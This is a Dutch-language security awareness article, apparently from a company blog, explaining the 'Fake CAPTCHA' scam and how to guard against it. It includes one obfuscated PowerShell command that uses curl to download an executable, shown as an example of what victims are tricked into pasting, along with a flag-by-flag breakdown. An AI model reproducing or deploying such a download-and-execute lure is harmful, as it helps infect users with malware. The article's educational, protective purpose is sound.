Home>cyberbedreiging

Tag: cyberbedreiging

Geüpdatet op /

Wat is de Fake CAPTCHA Scam en hoe kunt u zich beschermen?

De Fake CAPTCHA Scam is een vorm van cybercriminaliteit waarbij kwaadwillenden proberen uw computer te infecteren met malware door u te misleiden met een valse CAPTCHA-test. Deze tests lijken op de gebruikelijke “Ik ben geen robot” verificaties, maar in werkelijkheid zijn ze ontworpen om u schadelijke code te laten uitvoeren.

Hoe werkt de scam?

  1. Bezoek aan een verdachte website: U komt terecht op een website die u vraagt om een CAPTCHA-test te voltooien om toegang te krijgen tot bepaalde inhoud.
  2. Valse instructies: In plaats van de gebruikelijke afbeeldingen te selecteren, krijgt u instructies om een bepaalde opdracht uit te voeren. Bijvoorbeeld:
    • Druk op de Windows-toets + R.
    • Plak de inhoud van uw klembord in het dialoogvenster dat verschijnt.
    • Druk op Enter.
  3. Uitvoering van schadelijke code: De opdracht die u plakt, bevat vaak een verborgen PowerShell-script dat malware downloadt en uitvoert. Een voorbeeld van zo’n opdracht is:
powersheLL -w Minimized -c c"Ur"L.Ex"E" -k -L --"re"try 9"9"9 h"t"tps:/"/vd"tg".nl/"03"e"b8e6"f"6"e"7e"4"cdc.exe

In dit voorbeeld, download u met het programma CURL in PowerShell het kwaadaardige bestand 03eb8e6f6e7e4cdc.exe van onze website (https://vdtg.nl) te downloaden en uit te voeren.

Hierbij een technische uitleg van wat er gebeurd:

  • powersheLL -w Minimized: Start PowerShell in een geminimaliseerd venster.
  • -c: Geeft aan dat de volgende tekst een commando is dat moet worden uitgevoerd.
  • c”Ur”L.Ex”E”: Voert de curl.exe uit, een tool voor het overbrengen van gegevens via verschillende protocollen.
  • -k: Negeert SSL-certificaatfouten.
  • -L: Volgt eventuele redirects.
  • –“re”try 9″9″9: Probeert de download maximaal 999 keer opnieuw als deze mislukt.
  • h”t”tps:/”/vd”tg”.nl/”03″e”b8e6″f”6″e”7e”4″cdc: De URL van waaruit het bestand wordt gedownload.

Hoe kunt u zich beschermen?

  • Wees alert op verdachte CAPTCHA-tests: Als een CAPTCHA-test u vraagt om opdrachten uit te voeren buiten de browser, wees dan op uw hoede.
  • Gebruik een betrouwbare antivirussoftware: Zorg ervoor dat uw antivirusprogramma up-to-date is en uw systeem beschermt tegen dergelijke bedreigingen.
  • Vermijd onbekende websites: Bezoek alleen vertrouwde websites en wees voorzichtig met het klikken op links in e-mails of berichten van onbekende afzenders.
  • Controleer uw klembord: Voordat u iets plakt in een opdrachtprompt, controleer wat er op uw klembord staat.

Door deze voorzorgsmaatregelen te nemen, kunt u zichzelf beter beschermen tegen de Fake CAPTCHA Scam en andere vormen van cybercriminaliteit.

Vragen?

Neem dan contact met ons op.